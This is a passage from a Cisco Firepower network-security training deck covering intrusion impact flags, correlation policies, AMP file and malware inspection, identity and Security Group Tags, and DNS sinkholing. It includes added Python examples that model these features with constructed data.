  those that are relevant to your specific network
• Automatically tunes your Snort rules for the applications, servers, and hosts on your
  network
Firepower Recommended Rules (cont.)

(Screenshot slides of the Firepower Recommendations configuration; two of them are marked “For Your Reference”.)

• For different areas of your network, you can use different IPS Recommendations
Impact Assessment
How Relevant is the Attack?

• Prevents information overload

Impact flag 0 – Intrusion event: neither the source nor the destination IP address is within the range of
  your IP addresses. Administrator action: general info*. Why: event occurred outside profiled networks.
Impact flag 4 – Intrusion event: IP address of a host is within the defined IP range of your network, but
  there is no current host profile for the device. Administrator action: good to know, unknown target.
  Why: monitored network, but unknown host.
Impact flag 3 – Intrusion event: IP address of a host is within the defined IP range of your network, but
  no connection was made. Administrator action: good to know, currently not vulnerable. Why: relevant
  port not open or protocol not in use.
Impact flag 2 – Intrusion event: IP address of a host is within the defined IP range of your network, and
  a connection was made to a working service. Administrator action: investigate, potentially vulnerable.
  Why: relevant port open or protocol in use, but no vulnerability mapped.
Impact flag 1 – Intrusion event: event that is launched from a compromised host. Administrator action:
  act immediately, host vulnerable or compromised. Why: event corresponds to a vulnerability mapped to
  the host.

* If you have a fully profiled network this may be a critical event!
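
The impact-flag table above turned into a decision function, as an added example (not FMC code). The host profiles and profiled networks are constructed, and the function assumes the destination is the attacked host when it is monitored, with the source host only contributing the "launched from a compromised host" condition.

```python
"""Impact-flag assessment for an intrusion event, following the slide's table.

Added example, not code from the Cisco deck. Host profiles, profiled networks
and the events are constructed; the destination is treated as the attacked
host (port/vulnerability checks) unless only the source is monitored.
"""
import ipaddress
from dataclasses import dataclass, field

IMPACT_REASON = {
    0: "event occurred outside profiled networks",
    4: "monitored network, but unknown target host",
    3: "relevant port not open or protocol not in use",
    2: "relevant port open or protocol in use, but no vulnerability mapped",
    1: "event corresponds to a vulnerability mapped to the host, or host compromised",
}


@dataclass
class HostProfile:
    ip: str
    open_services: set = field(default_factory=set)     # {(proto, port)}
    vulnerabilities: set = field(default_factory=set)   # e.g. {"cve-2010-1850"}
    compromised: bool = False


@dataclass
class IntrusionEvent:
    src_ip: str
    dst_ip: str
    proto: str
    dst_port: int
    src_port: int = 0
    references: set = field(default_factory=set)   # rule references, e.g. {"cve-2010-1850"}


def in_profiled_networks(ip, networks):
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(n) for n in networks)


def impact_flag(event, networks, hosts):
    """Return (impact, reason); 1 is the most relevant, 0 the least."""
    src_in = in_profiled_networks(event.src_ip, networks)
    dst_in = in_profiled_networks(event.dst_ip, networks)
    if not src_in and not dst_in:
        return 0, IMPACT_REASON[0]
    # impact 1: the event was launched from a host already marked compromised
    src = hosts.get(event.src_ip)
    if src is not None and src.compromised:
        return 1, IMPACT_REASON[1]
    # the attacked side is the destination when it is monitored, else the monitored source
    if dst_in:
        target, port = hosts.get(event.dst_ip), event.dst_port
    else:
        target, port = src, event.src_port
    if target is None:
        return 4, IMPACT_REASON[4]
    if (event.proto, port) not in target.open_services:
        return 3, IMPACT_REASON[3]
    if event.references & target.vulnerabilities:
        return 1, IMPACT_REASON[1]
    return 2, IMPACT_REASON[2]


# constructed host map and profiled networks
PROFILED_NETWORKS = ["10.0.0.0/8"]
SAMPLE_HOSTS = {
    "10.1.1.10": HostProfile("10.1.1.10", {("tcp", 3306)}, {"cve-2010-1850"}),
    "10.1.1.20": HostProfile("10.1.1.20", {("tcp", 80)}),
    "10.1.1.30": HostProfile("10.1.1.30", {("tcp", 3306)}),
    "10.1.1.66": HostProfile("10.1.1.66", compromised=True),
}
```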
IPS Policy Architecture

(Two screenshot slides.)
IPS Policy in Access Control Policy

• Traffic must match in the Access Control Policy in order to be inspected
  • IPS policy for an individual rule
  • IPS policy as the default action
Operational Insights
Correlation Policy

• Respond in real time to threats and to network traffic that deviates from its normal profile
• Consists of two primary components: correlation rules and responses
• Correlation rules define what specifically you want to be alerted on:
  • Connection, intrusion, malware, discovery, user activity events
  • Network traffic that deviates from its normal profile
• Responses to correlation policy violations can be simple alerts, various remediation
  modules, or both
Correlating Event Data

Qualifiers that can be added to a correlation rule:
  • Connection Tracker – flow and connection conditions over time or volume
  • User Qualification – data from the user table (name, group info, etc.)
  • Host Profile Qualification – data from host profiles

When a…                  Add Connection Tracker   Add User Qualification   Add Host Profile Qualification
Intrusion Event          ✔                        ✔                        ✔
Discovery Event          ✔                        ✔                        ✔
Connection Event         ✔                        ✔                        ✔
Host Input Event         ✔                        ✔                        ✔
User Activity Occurs     ✔                        N/A                      ✔
Traffic Profile Changes  N/A                      N/A                      N/A
Malware Event            N/A                      N/A                      N/A
Correlation Rule Configuration (For Your Reference)
Overview

(Screenshot.)
Correlation Policy Responses

• A correlation policy lets you respond automatically when a violation or suspicious
  activity is detected
• Responses include:
  • Simple alerts – email, SNMP and syslog
  • Remediation modules
  • A combination of remediation modules and simple alerts

(Diagram: Correlation Policy -> Correlation Rule -> Correlation Event -> Action -> Email / Syslog / SNMP / Remediation Module)
Remediation Modules
Overview

• A program that the Firepower System launches in response to a correlation policy
  violation
• The system supports several remediation modules:
  • pxGrid mitigation
  • Cisco IOS Null Route
  • Nmap Remediation
  • Set Attribute Value
• You can upload custom remediation modules
Implementing Remediations

• Create at least one instance for the module you choose

• You can create multiple instances per module, where each instance is configured
differently

Implementing Remediations (cont.)

(Three screenshot slides, “For Your Reference”, of the remediation instance configuration.)
Correlation Policy Example (For Your Reference)
Production Network Change

• Scenario: new IP addresses appear on the network
• Steps shown in the screenshot slides: create the policy, add the rules, configure the responses
Are You Hungry?

Lunch – 1 Hour 45 Minutes
AMP for Networks
AMP for Networks - Basics

• Can detect, track, store, analyze, and optionally block the transmission of malware
  and of all files of a specific type (regardless of whether the files contain malware) in
  network traffic
• File policies are created and associated with access control rules, which handle the
  network traffic that matches the rules
• Files detected in traffic can be captured, analyzed locally, and/or submitted to the AMP
  Threat Grid cloud or appliance (dynamic analysis) to determine whether the files
  represent malware
AMP for Networks - Inspection Path

(Diagram of the inspection path for an incoming packet between datapath RX and TX:
  Rule 1: Monitor – matching traffic continues to the next rule
  Rule 2: Trust – no inspection
  Rule 3: Block – no inspection
  Rule 4: Allow – File/AMP Processing (malware blocked), Intrusion Policy (intrusions blocked), Network Discovery
  Default Action: Intrusion Prevention – Network Analysis Policy, Intrusion Policy (intrusions blocked), Network Discovery
  Traffic that does not match a rule falls through to the next one.)
File/AMP Processing
Actions on a File Rule

• File Type Control actions: Detect Files, Block Files
  • Files can be stored regardless of malware disposition
• Malware Analysis actions: Malware Cloud Lookup, Block Malware
  • Analysis options: Spero Analysis for MSEXE, Local Malware Analysis, Dynamic Analysis
  • Files can be stored based on malware disposition: Malware, Unknown, Clean, Custom
Order of Processing Malware Analysis - 1 (For Your Reference)

Managed devices monitor network traffic for transmissions of certain file types.

(Flowchart:
  1. File size > limit? Yes -> stop file capture.
  2. Entire file seen? No -> keep waiting; Yes -> calculate SHA-256.
  3. Action is Malware Cloud Lookup or Block Malware -> drop the last packet, do the SHA-256 lookup
     (sensor local cache -> FMC Analysis Engine cache -> public/private AMP Cloud), then force a retransmit.
  4. File is Malware? Yes -> malware event and block.
  5. File is Clean? Yes -> no further processing (end).
  6. File was captured? Yes -> continue with part 2.)
Order of Processing Malware Analysis – 2 (For Your Reference)

(Flowchart, continued:
  1. Inspect archive? Yes -> extract contents (or mark as uninspectable archive).
  2. Store files? Yes -> capture file.
  3. Spero? If Spero-supported file -> compute Spero hash -> public/private AMP Cloud.
  4. Local Malware Analysis? If Office, PDF or EXE -> ClamAV pre-classification + high-fidelity scan.
  5. Dynamic Analysis? If ClamAV pre-classification flagged the file -> file submission to public/private Threat Grid.
  6. File event; capacity handling.)
Local Malware Analysis

• ClamAV pre-classification flags (a flagged file is a suspect file and is submitted to the
  public/private Threat Grid; a normal file gets no further processing):
  CL_TYPE_EXE, CL_TYPE_UNKNOWN, CONTAINS_EMBEDDED_EXE, CONTAINS_EMBEDDED_HTML,
  CONTAINS_EMBEDDED_MACROS, CONTAINS_FLASH_OBJECT, CONTAINS_NUMEROUS_OBJECTS,
  EXE_ABNORMAL_ENTRYPOINT, EXE_NUMEROUS_SECTIONS, EXE_PACKED, EXE_PARSER_FAILURE,
  JSON_INACTIVE, OLE_MACRO, OLE_PARSE_ERROR, OLE_VBA, PDF_ACRO_FORM, PDF_JAVASCRIPT,
  PDF_NO_EOF, PDF_OPEN_ACTION
Local Malware Analysis Files on Disk (CLI)

• Required signature data files, which the Clam analysis engine uses for pre-classification
  and for static analysis:

    > expert
    admin@gate2:~$ sudo su
    Password:
    root@gate2:/var/sf/clamupd_download# ls -l *.cvd
    -rw-r--r-- 1 root root 4643591 Jan 16 16:35 hifistatic.cvd
    -rw-r--r-- 1 root root 45011 Dec 5 15:58 preclass.cvd

• NOTE: If “Enable Automatic Local Malware Detection Updates” is enabled, the Firepower
  Management Center checks for signature updates once every 30 minutes
Dynamic Analysis aka Threat Grid
Unified malware analysis and threat intelligence platform

• Automated engine observes, deconstructs and analyzes each file submitted:
  • Static analysis
    • File on disk
    • Header details
    • AV engines
  • Dynamic analysis
    • Execution/detonation
    • Network connections
    • File/system changes
    • Function/library calls
• Produces human readable behavioral indicators for each file submitted
• Global scalability drives context rich information, which can be consumed directly or
  via content rich threat intelligence feeds – “Wikipedia of Malware”
Threat Grid Supported File Types

• Wide range of supported file types (examples):
  • Executables
  • Java, JavaScript
  • PDF, SWF
  • Office files
  • Archives (ZIP, XZ, GZ, BZ2, TAR)
  • Scripts (BAT, PS1, VBS, WSF)
  • URLs
  • All files executed by Windows (.PE32 / .PE32+ files)
• Limitations:
  • .TXT / .APK / .DOS are not supported
  • Maximum file size: 100MB
  • Files should not be empty
  • ZIP archives may contain a maximum of 255 files. Archives with more than 255 files will
    return no analysis, and will display an error stating that too many files were found
  • The maximum file size for each file within a ZIP archive is 100MB (unzipped)
  • ZIP archive size cannot be greater than 600MB when unzipped

https://panacea.threatgrid.com/doc/main/release_notes.html
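
The limits listed above as a pre-submission check, added here as an example (not Threat Grid or Cisco code). The sample archives are built in memory with zipfile, so the check runs offline; the member sizes it reads come from the archive's own central directory.

```python
"""Pre-submission checks mirroring the Threat Grid limits listed on the slide.

Added example, not Cisco or Threat Grid code. The limits are the ones the slide
states; the sample files are constructed in memory, so nothing touches the network.
"""
import io
import os
import zipfile

MAX_FILE_BYTES = 100 * 1024 * 1024           # 100 MB per file (also per member, unzipped)
MAX_ZIP_MEMBERS = 255
MAX_ZIP_UNZIPPED_BYTES = 600 * 1024 * 1024   # 600 MB total when unzipped
UNSUPPORTED_EXT = {".txt", ".apk", ".dos"}


def check_submission(name, data):
    """Return the reasons the file would be rejected; an empty list means it may be submitted."""
    problems = []
    if len(data) == 0:
        problems.append("file is empty")
    if len(data) > MAX_FILE_BYTES:
        problems.append("file larger than 100 MB")
    ext = os.path.splitext(name)[1].lower()
    if ext in UNSUPPORTED_EXT:
        problems.append(f"file type {ext} is not supported")
    if ext == ".zip" and data:
        problems.extend(check_zip(data))
    return problems


def check_zip(data):
    """Apply the ZIP-specific limits from the central directory, without extracting anything.

    The sizes in the central directory are written by whoever built the archive, so the
    check is advisory: it rejects archives that declare themselves too large, it does not
    protect against ones that lie about their size.
    """
    problems = []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            members = [m for m in zf.infolist() if not m.is_dir()]
    except zipfile.BadZipFile:
        return ["not a valid ZIP archive"]
    if len(members) > MAX_ZIP_MEMBERS:
        problems.append(f"archive has {len(members)} files; more than 255 returns no analysis")
    oversized = [m.filename for m in members if m.file_size > MAX_FILE_BYTES]
    if oversized:
        problems.append(f"members larger than 100 MB unzipped: {oversized}")
    if sum(m.file_size for m in members) > MAX_ZIP_UNZIPPED_BYTES:
        problems.append("archive exceeds 600 MB when unzipped")
    return problems


def build_zip(members):
    """Constructed helper: build an in-memory ZIP from {name: bytes} for the checks above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()
```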
Workflows for Public Cloud
Step by step workflows taken during malware detection

1. SHAs are generated by AMP on the FTD, which queries the FMC
2. If the FMC does not have a cached disposition, the FMC queries the AMP Cloud for a
   reputation lookup
3. Reputation returned:
   • If Clean – file download completed
   • If Malicious – file download dropped
   • If Unknown – file copied for pre-classification (ClamAV) and the download completes
4. If supported, the file is sent to Threat Grid for analysis
5. Threat score passed to the AMP Cloud (Poke)
6. The AMP Cloud generates a disposition and sends it to the AMP Connector (PING2) via
   the FMC

NOTE: In deployment scenarios where the devices communicate with the TG cloud, the
UUID is used to know which FMC should receive the return data

(Diagram: FTD <-> FMC <-> AMP Cloud <-> Threat Grid, numbered with the steps above.)
File Policies
Part of the overall Access Control configuration

• A set of configurations that the system uses to perform AMP for Networks and file
  control, as part of the overall access control configuration
• This association ensures that before the system passes a file in traffic that matches an
  access control rule’s conditions, it first inspects the file
• Associate a single file policy with an access control rule whose action is Allow,
  Interactive Block, or Interactive Block with reset
• NOTE: You cannot use a file policy to inspect traffic handled by the access control
  Default Action

(Diagram: Access Control Policy – Rule 1: Allow -> matching traffic -> File Policy A; Rule 2: Allow
-> matching traffic -> File Policy B; Default Action: IPS -> traffic allowed without file inspection.)
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy

• To improve performance, restrict file detection to only one of the application protocols
  on a per-file-rule basis
• NOTE: Frequently triggered file rules can affect system performance. For example,
  detecting multimedia files in HTTP traffic (YouTube, for example, transmits significant
  Flash content) could generate an overwhelming number of events
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy

• Use Any to detect files over multiple application protocols, regardless of whether users
  are sending or receiving
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy

• NOTE: File rules are evaluated in rule-action order, not numerical order
File Rule Configuration
Policies > Access Control > Malware & File > New File Policy

Changes that cause the Snort process to restart:
• Adding the first or removing the last file rule that combines the Malware Cloud Lookup or
  Block Malware file rule action with an analysis option or a store files option (Malware,
  Unknown, Clean, or Custom)
• Enabling or disabling Store files in a Detect Files or Block Files rule
File Policy Configuration

• Order does not matter
• Blocking takes precedence over malware inspection and blocking, which takes
  precedence over simple detection and logging
• If two or more rules match for the same file type:
  1. Block Files
  2. Block Malware
  3. Malware Cloud Lookup
  4. Detect Files
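
Added Python example (not FTD code) that combines the precedence list above with the lookup chain from the order-of-processing slides (sensor cache, FMC cache, AMP Cloud): the caches, the capture size limit and the sample file bytes are constructed.

```python
"""File-rule precedence and disposition handling for AMP for Networks.

Added example, not Cisco code. It applies the slide's precedence
(Block Files > Block Malware > Malware Cloud Lookup > Detect Files) when several
file rules match the same file type, then models the SHA-256 lookup chain
(sensor cache -> FMC cache -> AMP Cloud) with constructed caches and a
constructed file-size limit.
"""
import hashlib

PRECEDENCE = ["Block Files", "Block Malware", "Malware Cloud Lookup", "Detect Files"]
MAX_CAPTURE_BYTES = 10 * 1024 * 1024   # constructed file-size limit for capture


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def effective_action(matching_rules):
    """Highest-precedence action among the rules that matched; rule order in the policy is irrelevant."""
    actions = {r["action"] for r in matching_rules}
    for action in PRECEDENCE:
        if action in actions:
            return action
    return None


class DispositionLookup:
    """Three-level SHA-256 lookup: sensor cache, then FMC cache, then the AMP Cloud (constructed dicts)."""

    def __init__(self, sensor_cache, fmc_cache, amp_cloud):
        self.levels = [("sensor", sensor_cache), ("fmc", fmc_cache), ("cloud", amp_cloud)]
        self.queries = []   # which levels were consulted, for inspection in tests

    def disposition(self, sha):
        for name, table in self.levels:
            self.queries.append(name)
            if sha in table:
                # populate the caches below the level that answered, so the next lookup stops early
                for _, lower in self.levels:
                    if lower is table:
                        break
                    lower[sha] = table[sha]
                return table[sha]
        return "Unknown"


def process_file(file_bytes, matching_rules, lookup):
    """Return (verdict, disposition, events) for one transferred file."""
    action = effective_action(matching_rules)
    events = []
    if action is None:
        return "allow", None, events
    if action == "Block Files":
        events.append("file event: blocked by type")
        return "block", None, events
    if action == "Detect Files":
        events.append("file event: detected")
        return "allow", None, events
    # Malware Cloud Lookup or Block Malware: the file must be fully seen and within the limit
    if len(file_bytes) > MAX_CAPTURE_BYTES:
        events.append("file event: size over limit, capture stopped")
        return "allow", None, events
    sha = sha256_hex(file_bytes)
    dispo = lookup.disposition(sha)
    if dispo == "Malware":
        events.append(f"malware event: {sha[:12]}")
        if action == "Block Malware":
            return "block", dispo, events   # the last packet is dropped, transfer never completes
    else:
        events.append(f"file event: disposition {dispo}")
    return "allow", dispo, events
```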
File Policy Association
Granular control to identify and block files transmitted on your network

• Associate a single file policy with an access control rule
• The Default Action cannot be associated with a file policy
File Policy Attached to Main Access Policy

    root@gate1:/var/sf/detection_engines# cd 713c210c-7774-11e7-8d1c-c97d791ede62/
    root@gate1:/var/sf/detection_engines/713c210c-7774-11e7-8d1c-c97d791ede62# cat ngfw.rules
    #### ngfw.rules
    --- snip ---
    filepolicy 1 2526c8a2-3f52-11e8-b561-4c4afb51c75b
    threatlevel 76
    firstTimeAnalysis 1
    malware log,block,reset http any neutral capture,sandbox
    21:1,23:11,120:248,22:9,282:9,283:9,284:9,285:9,286:9,287:9,288:9,289:9,27:15
    type log http any none none
    --- snip ---
    endpolicy
    --- snip ---
    # Start of AC rule.
    --- snip ---
    268448775 allow 2 any any 3 any any any any (log dcforward both) (ipspolicy 1) (filepolicy 1 enable) (appid
    225:1, 3501:1, 676:1, 1696:5, 846:7, 4084:5)
    # End rule 268448775
AMP for Endpoints
AMP for Endpoints vs. AMP for Networks
FMC works with data from AMP for Networks and AMP for Endpoints

• AMP for Endpoints:
  • Malware detection is performed at the endpoint at download or execution time
  • Malware events detected by AMP for Endpoints contain information on file path,
    invoking client application, …
• AMP for Networks:
  • Managed devices detect malware in network traffic
  • Network traffic contains port, application protocol, and originating IP address
    information about the connection used to transmit the file
AMP for Networks vs. AMP for Endpoints
FMC works with data from AMP for Networks and AMP for Endpoints

• The system uses IP and MAC address data to tag monitored hosts with indications of
  compromise obtained from your AMP for Endpoints deployment
• Malware events generated by AMP for Endpoints do not add hosts to the network map
• Depending on the deployment, endpoints monitored by AMP for Endpoints may not be the
  same hosts as those monitored by AMP for Networks
Configuring an AMP for Endpoints Cloud Connection

• AMP for Endpoints can import threat identifications, indications of compromise (IOC),
  and other malware-related information from the AMP cloud to the system
• Choose the cloud (private / public); proceed as described in:
  http://cs.co/9009E359h
• The check box appears only in the Global domain
• In high availability configurations, configure AMP cloud connections independently on the
  Active and Standby instances of the Firepower Management Center; these configurations
  are not synchronized
Verify AMP for Endpoints Cloud Connection

• Configure settings as needed. Define group membership and assign policies

AMP for Endpoints Integration
Network File Trajectory with AMP for Endpoints Events
Identity and TrustSec
FTD Identity Information

User Control                                        User Awareness
HR User can have access to Social Media             Is 10.10.10.23 an HR User or an ENG User?
ENG User does NOT have access to Social Media       10.10.10.23 is an HR User

(Diagram: HR User 10.10.10.23 and ENG User 10.10.10.24 reach the FTD over Remote Access VPN,
wireless and the switch; the FMC holds the user-IP mapping; traffic continues through the routers
to the Internet.)
User Awareness in Connection Events

• Connection Events – Initiator User

User Based Indication of Compromise (IoC)

(Two screenshot slides.)

User Control

(Screenshot slide.)
User Identity Sources

The Firepower System supports the following identity sources:
• User Discovery
  • Traffic-based detection
• Passive Authentication
  • Identity Services Engine (ISE/ISE-PIC)
  • Firepower User Agent
  • Cisco Terminal Services (TS) Agent
• Active Authentication
  • Captive portal authentication
• Remote Access VPN
Warning Message About Cisco Firepower User Agent EOL (For Your Reference)
Identity Services Engine (ISE)
Cisco Platform Exchange Grid (pxGrid)

• Exchanged between ISE and the FMC over pxGrid: IP - User mapping, Device Type,
  Location IP, SGT, and Rapid Threat Containment

(Diagram: Active Directory <-> Cisco ISE <-> FMC; HR User over Remote Access VPN / wireless /
switch -> routers -> FTD -> DC switch -> HR servers and ENG servers.)
Identity Services Engine (ISE) (For Your Reference)

• Provides user awareness data for users who authenticate using Active Directory (AD),
  LDAP, RADIUS, or RSA
• You can perform user control on Active Directory users
• Authoritative identity source
• Does not report the activity of ISE Guest Services users
ISE Passive Identity Connector (ISE-PIC)

• Input to ISE-PIC: WMI, ISE-PIC Agent, Kerberos SPAN, REST API, Syslog
• Output to FMC: pxGrid Publish/Subscribe

(Diagram: Windows domain logon -> Active Directory -> ISE-PIC -> User-IP mapping -> FMC;
non-802.1X wireless network and switch -> routers -> FTD -> DC switch -> HR and ENG servers.)
ISE-PIC

• The Cisco ISE Passive Identity Connector is a subset of functionality offered with
Cisco Identity Service Engine
• Supports only passive ID functionality

• ISE-PIC does not provide ISE attribute data (SGT, Device Type, Location)

• ISE-PIC does not support ISE Rapid Threat Containment

• Supports up to 100 domains

• SXP is not supported by ISE-PIC

Access Control Identity Policy

• Access Control > Identity: configure the Identity Policy first, then Add Rule
• Add Rule: choose Active or Passive Authentication
• Access Control > Access Control: bind the Identity Policy to the Access Control Policy
ISE Integration – AD Group Information (For Your Reference)

• User and AD group information
• Authenticated users are supported for enforcement scenarios
Cisco TrustSec Overview
Segmenting with Security Group Tags (SGTs)

(Diagram: Active Directory <-> Cis­co ISE -> SGT-IP mapping -> FMC. HR User (SGT 5) over Remote
Access VPN / wireless / switch -> routers -> FTD -> DC switch -> HR servers (SGT 8) and ENG servers
(SGT 7). Stages: Classification, Propagation, Enforcement.)
Security Group Tags (SGT) Classification

• Dynamic Classification
  • MAB
  • 802.1x
  • WebAuth
• Static Classification
  • L3 Interface (SVI)
  • VLAN
  • Subnet
  • L2 port
  • VM (Port Profile)

SGT Dynamic Classification

• Authorization Policy in ISE – Assign Security Groups based on conditions

SGT Static Classification

• IP-SGT Static Mappings are the easiest way to add mappings to ISE
Security Group Tags (SGT) Propagation

• Control Plane Propagation
  • Out-of-band SGT
  • IP-to-SGT data shared over a control protocol between ISE and FMC
  • Methods include IP-to-SGT exchange over: SXP, pxGrid
• Data Plane Propagation
  • Inline SGT
  • SGT carried inline in the data traffic
  • Methods include SGT over: Ethernet, MACsec, LISP/VXLAN, IPsec, DMVPN, GETVPN

Frame with inline SGT (Cisco Meta Data, CMD):
  DMAC | SMAC | 802.1AE Header | 802.1Q | CMD | ETYPE | PAYLOAD | ICV | CRC
CMD field:
  CMD EtherType | Version | Length | SGT Opt Type | SGT Value (16 bit, 64K SGTs) | Other CMD Options
SGT Propagation to FMC – pxGrid and SXP

(Screenshot: pxGrid topics.)

Security Group Tags (SGT) Propagation

• All learned and locally defined SXP mappings in ISE
• SXP propagation to FMC is only via an ISE subscription
SGT Propagation - Inline Security Group Tags

• Can be used for the Source SGT
• Inline SGTs seen in traffic take precedence over the SGT-to-IP mapping provided by ISE
• Untagged traffic is still matched to a rule using the IP-to-SGT mapping provided by ISE
• ISE integration is not needed – SGTs can be defined in the FMC
• FTD does not add or remove tags from traffic
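
The precedence rules above as an added Python example (not FTD code): an inline tag on the frame decides the source SGT, untagged traffic falls back to the ISE IP-to-SGT mapping, and the destination SGT always comes from the mapping. The ISE mappings, SGT numbers and the two access control rules are constructed.

```python
"""Source/destination SGT resolution as the slides describe it, then rule matching.

Added example, not FTD code. The mappings, SGT numbers and rules are constructed.
"""
import ipaddress

# constructed IP-to-SGT mappings as ISE would publish them (longest prefix wins)
ISE_MAPPINGS = {
    "10.10.10.0/24": 5,   # HR users
    "10.20.0.0/16": 7,    # ENG servers
    "10.20.1.0/24": 8,    # HR servers (more specific than the ENG range)
}

# constructed access control rules with SGT criteria; an empty set means "any"
POLICY = [
    {"name": "HR to HR servers", "src_sgts": {5}, "dst_sgts": {8}, "action": "allow"},
    {"name": "ENG to ENG servers", "src_sgts": {7}, "dst_sgts": {7}, "action": "allow"},
]


def ip_to_sgt(ip, mappings=ISE_MAPPINGS):
    """Longest-prefix lookup in the ISE-provided IP-to-SGT table; None when unmapped."""
    addr = ipaddress.ip_address(ip)
    best = None
    for prefix, sgt in mappings.items():
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0]):
            best = (net.prefixlen, sgt)
    return None if best is None else best[1]


def resolve_source_sgt(ip, inline_sgt, mappings=ISE_MAPPINGS):
    """An inline SGT seen in traffic takes precedence; untagged traffic uses the ISE mapping."""
    if inline_sgt is not None:
        return inline_sgt
    return ip_to_sgt(ip, mappings)


def rule_matches(rule, src_sgt, dst_sgt):
    return ((not rule["src_sgts"] or src_sgt in rule["src_sgts"]) and
            (not rule["dst_sgts"] or dst_sgt in rule["dst_sgts"]))


def evaluate(policy, flow, mappings=ISE_MAPPINGS):
    """First-match evaluation. flow = {"src_ip", "dst_ip", optional "inline_sgt"}.

    Returns (rule name, action, source SGT, destination SGT); unmatched flows hit
    a constructed default block.
    """
    src_sgt = resolve_source_sgt(flow["src_ip"], flow.get("inline_sgt"), mappings)
    dst_sgt = ip_to_sgt(flow["dst_ip"], mappings)   # destination SGT only comes from the mapping
    for rule in policy:
        if rule_matches(rule, src_sgt, dst_sgt):
            return rule["name"], rule["action"], src_sgt, dst_sgt
    return "default", "block", src_sgt, dst_sgt
```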
Inline Security Group Tags (SGT) Configuration

• Locally defined SGTs are Objects on the FMC

Security Group Tags (SGT) Enforcement

• Access Control Policy with Source and Destination SGT

Create Access Control Rules with SGT Criteria

• Select the SGT/ISE Attributes tab
• Select “Security Group Tag” from Available Metadata
• Add an SGT to Source and/or Destination

ISE Integration – Security Group Tag / Device Type / Location IP (For Your Reference)

(Screenshot slides of the SGT/ISE Attributes tab, followed by a Security Group Tags (SGT) summary slide.)
Demo:
Identity and SGT

Security Intelligence

• TALOS dynamic feed, 3rd party feeds and lists
• Network Intelligence
• URL Intelligence
• DNS Intelligence
• Multiple Categories: Attacker, Bogon, Bots, CnC, Cryptomining, DGA, Exploitkit, Malware,
  OpenProxy, OpenRelay, Phishing, Response, Spam, Suspicious, TorExitNode
• Multiple Actions: Allow, Monitor, Block, Interactive Block…
Security Intelligence Policy
Access Control Policy Configuration

(Screenshots: Security Intelligence tab with IP addresses and URLs; Security Intelligence Feed
Service; Security Intelligence Dashboard.)
DNS Security Intelligence
DNS Protection

• Attackers are leveraging DNS!
• Blacklist domains associated with Bots, CnC, Malware Delivery
• Fast-flux: high frequency DNS record changes
• Control C&C traffic and botnets
• Restrict access to domains violating corporate policy
DNS Inspection

• Security Intelligence extended to inspect DNS lookups
• Drop or monitor DNS connections to malicious sites
• Supports all of the functionality in IP/URL based SI (i.e., custom lists/feeds/global
  blacklists/whitelists)
• Blocking DNS connections supports the following additional actions:
  • Sinkhole
  • NXDOMAIN
Configuring DNS Policy

• Create new DNS policies (adds a new DNS Policy)

DNS Policy

(Screenshot.)

DNS Rule Configuration

(Screenshot: Actions.)
Action: DNS Sinkhole

(Diagram: the infected host sends a C&C-over-DNS lookup towards the local DNS server and the
Internet; instead of the real answer, the client receives the sinkhole IP; its connection to the
sinkhole server generates a local SI event and an IoC.)
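
The sinkhole flow drawn above, as an added simulation (not FTD code): the DNS list, sinkhole address, client and connection records are constructed, and the NXDOMAIN and Monitor actions from the DNS Inspection slide are included alongside Sinkhole.

```python
"""DNS sinkhole action as drawn on the slide: the answer for a listed domain is
rewritten to the sinkhole IP, and the client's later connection to that IP
produces a Security Intelligence event and an IoC on the host.

Added example, not FTD code. Domains, sinkhole IP, policy action and the
sample connection records are constructed.
"""
SINKHOLE_IP = "192.0.2.99"   # constructed sinkhole address (TEST-NET-1)

# constructed DNS list: domain -> SI category
DNS_LIST = {"cnc.example.invalid": "CnC", "loader.example.invalid": "Malware"}


def apply_dns_rule(qname, answers, action="sinkhole"):
    """Return (answers_sent_to_client, si_event_or_None) for one DNS response."""
    category = DNS_LIST.get(qname.lower().rstrip("."))
    if category is None:
        return answers, None   # not listed: the real answer passes through
    event = {"type": "dns", "domain": qname, "category": category}
    if action == "sinkhole":
        event["action"] = "Sinkhole"
        return [SINKHOLE_IP], event   # the real answer never reaches the client
    if action == "nxdomain":
        event["action"] = "Domain Not Found"
        return [], event
    event["action"] = "Monitor"
    return answers, event


def sinkhole_ioc(connections):
    """Connections to the sinkhole IP become SI events; each source host is tagged with an IoC."""
    events, ioc_hosts = [], set()
    for conn in connections:
        if conn["dst"] == SINKHOLE_IP:
            events.append({"type": "connection", "src": conn["src"], "dst_port": conn["dst_port"],
                           "action": "Sinkhole", "ioc": "DNS sinkhole contact"})
            ioc_hosts.add(conn["src"])
    return events, sorted(ioc_hosts)


def simulate_client(client_ip, qname, real_answers, connections, action="sinkhole"):
    """Constructed client: resolve qname through the policy, then connect to the first answer."""
    answers, dns_event = apply_dns_rule(qname, real_answers, action)
    if answers:
        connections.append({"src": client_ip, "dst": answers[0], "dst_port": 443})
    return dns_event
```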
Associate DNS Policy with an Access Control Policy

(Screenshot: DNS Policy selection.)

Security Intelligence Events

(Screenshot: Security Intelligence Category, Action: Sinkhole.)
Cisco Threat Intelligence Director (CTID)

• Problem:
  • “More intelligence sources become available every day, but products that are expected to
    provide utility from that intelligence aren’t evolving to operationalize it”
• Solution: CTID
  • Uses 3rd party threat intelligence to identify threats and automatically blocks supported
    indicators on the NGFW
  • Provides a single integration point for all STIX and CSV intelligence sources
• Two elements:
  • STIX (Structured Threat Information eXpression) is a standard for sharing and using threat
    intelligence information
  • TAXII (Trusted Automated eXchange of Indicator Information) is a transport mechanism for
    threat information
How Does It Work?

Diagram: the Cisco Threat Intelligence Director on the FMC publishes SI Lists (Block or Monitor) to the firewalls

Step 1: Ingest third-party Cyber Threat Intelligence (CTI)
Step 2: Publish observables to firewalls
Step 3: Detect and alert on incidents
Prerequisites

• FMC:
  • 6.2.2 (or later) version (can be hosted on physical or virtual FMCs)
  • Minimum of 15 GB of memory (FMCv)
  • REST API access enabled
• Advanced Settings tab of the Access Control Policy option → Enable Threat Intelligence Director (default)
CTID Status

• Service is running:

